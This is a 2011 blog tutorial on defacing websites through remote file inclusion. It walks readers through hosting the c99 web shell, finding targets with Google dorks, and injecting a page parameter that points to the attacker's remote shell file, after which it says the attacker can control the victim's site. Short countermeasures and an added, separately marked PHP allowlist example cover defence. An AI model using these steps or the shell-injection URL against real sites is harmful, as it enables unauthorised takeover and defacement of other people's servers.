Saturday, April 30, 2011
Defacing Website Using RFI | Remote File Inclusion Attacks | Explained.
Before starting this tutorial, I would like to tell you about a piece of code called a shell. There are many shells available. Let's consider one known as the c99 shell. First download it from here.
Now sign up for an account on any free web hosting site, say 110mb.com. Sign in to your account, go to the file manager, upload some files, and then upload the c99 shell. Now log out and visit the URL of the shell you uploaded:
http://username.110mb.com/shell.php
You will find that you can manage all your directories and files without logging in to your account, that is, without entering your password anywhere.
Both images show the file manager: in the first I am accessing it by signing in to my account, and in the second just by accessing the shell, without logging in.
I just wanted to show you how deadly it can be if somebody somehow uploads this kind of shell to your server. This is where the concept of Remote File Inclusion comes into the picture.
Note: Your account might be suspended after uploading such shells.
What is Remote File Inclusion?
As the name makes clear, Remote File Inclusion means 'including a remote file'. RFI is a vulnerability found in websites that allows attackers to include a remote file on the web server. This may lead to remote code execution and complete compromise of the system.
How to perform the attack?
Step 1. Upload a shell in text format to your web hosting site. That is, copy the code of the shell, save it as a text file and upload it. Note down the complete path of your shell.
Step 2. Search for vulnerable sites using Google dorks, like:
inurl:index.php?id=
inurl:index.php?page=
You can also use automated tools for this.
Step 3. Let's say you found a site like
http://www.victim.com/index.php?page=anything
Replace this URL with http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
If the victim's site is vulnerable, your shell might have been uploaded to the server. Now you can do anything with the victim's site, or maybe even with other sites running on the same web server, simply by accessing your shell.
Possible Countermeasures:
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini.
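The two countermeasures above, as an added example that is not part of the original post: a hypothetical PHP front controller in which the page parameter is only a key into a fixed allowlist, plus a startup check on allow_url_include. The page names and the pages/ directory are constructed for illustration.

```php
<?php
// Added example: hypothetical index.php front controller, not code from the post.

// Vulnerable pattern behind URLs such as index.php?page=... :
//   include $_GET['page'];
// With allow_url_include=On, a page value that is a URL makes PHP fetch the
// remote file and execute it as part of the page.

// Hardened form: the request value is only a lookup key, so the include path
// never contains request data. Page names and file paths are constructed.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-string values are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key match only: URLs, stream wrappers (php://, data://), "../"
    // sequences and NUL bytes can never match one of the listed keys.
    return PAGES[$requested] ?? null;
}

// Defence in depth: refuse to serve if remote includes are enabled in php.ini.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    error_log('allow_url_include is enabled; refusing to serve requests');
    exit;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    // Log rejected values so inclusion attempts show up in monitoring.
    http_response_code(404);
    error_log('rejected page parameter from ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
    exit('Page not found');
}
require $target;
```

Disabling allow_url_include closes the remote case only; the allowlist also stops inclusion of unintended local files, which the php.ini settings do not address.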
This post was written by: Ashif Ismail
Ashif Ismail is a professional blogger, software programmer and front-end web developer.
2 Responses to “Defacing Website Using RFI | Remote File Inclusion Attacks | Explained.”
September 23, 2011 at 10:02 PM
RFI remote hacking is a new technique. Most people do this kind of activity.